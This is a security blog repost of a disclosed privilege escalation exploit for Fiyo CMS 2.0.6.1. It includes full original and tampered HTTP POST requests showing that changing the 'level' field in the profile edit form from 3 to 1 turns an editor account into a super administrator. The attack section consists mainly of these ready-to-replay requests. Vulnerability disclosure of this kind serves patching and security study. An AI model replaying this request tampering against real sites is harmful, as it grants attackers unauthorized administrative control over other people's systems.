Fiyo CMS 2.0.6.1 权限提升漏洞

# Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1
# Google Dork: no
# Date: 11-03-2017
# Exploit Author: @rungga_reksya, @dvnrcy
# Vendor Homepage: http://www.fiyo.org
# Software Link: https://sourceforge.net/projects/fiyo-cms
# Version: 2.0.6.1
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVE : no
 
I. Background (Bahasa/Indonesian Language):
Fiyo CMS dikembangkan dan dibuat pertama kali oleh mantan seorang pelajar SMK yang pada saat itu bersekolah di SMK 10 Semarang jurusan RPL. Pada zaman itu namanya bukan Fiyo CMS melainkan Sirion yang merupakan akronim dari Site Administration.
 
II. Description:
Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1
 
III. Exploit:
Fiyo CMS have five user group (super administrator, administrator, editor, publisher, member) and only three group can access backend page of admin (super administrator, administrator and editor).
 
If we login as super administrator and access edit profile menu, check source code (ctrl+u) from your browser and we get level privilege:
super administrator = 1
administrator = 2
editor = 3
publisher = 4
member = 5
 
Ok, prepare your tool like burpsuite to intercept traffic. in this case I login as editor and I want manipulation of editor group (level=3) to be super administrator group (level=1).A  The first you access on menu aEdit Profilea and click aSimpan (Save)a, and then change like this on your burpsuite intercept menu:
 
Original:
 
POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
Host: 192.168.1.2
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
 
edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=3&name=editor&bio=
 
 
Manipulation (Change Level=3 to be Level=1):
 
POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
Host: 192.168.1.2
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
 
edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=1&name=editor&bio=
 
Yeaaah, now editor become super administrator privilege and The level of administrator can be super administrator too ^_^
 
 
IV. Thanks to:
- Alloh SWT
- MyBoboboy
- MII CAS
- Komunitas IT Auditor & IT Security Kaskus

本文固定链接: https://www.unhonker.com/bug/1982.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2017年03月13日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Fiyo CMS 2.0.6.1 权限提升漏洞 | 90' s Blog|关注网络信息安全
关键字:
【上一篇】
【下一篇】

Fiyo CMS 2.0.6.1 权限提升漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!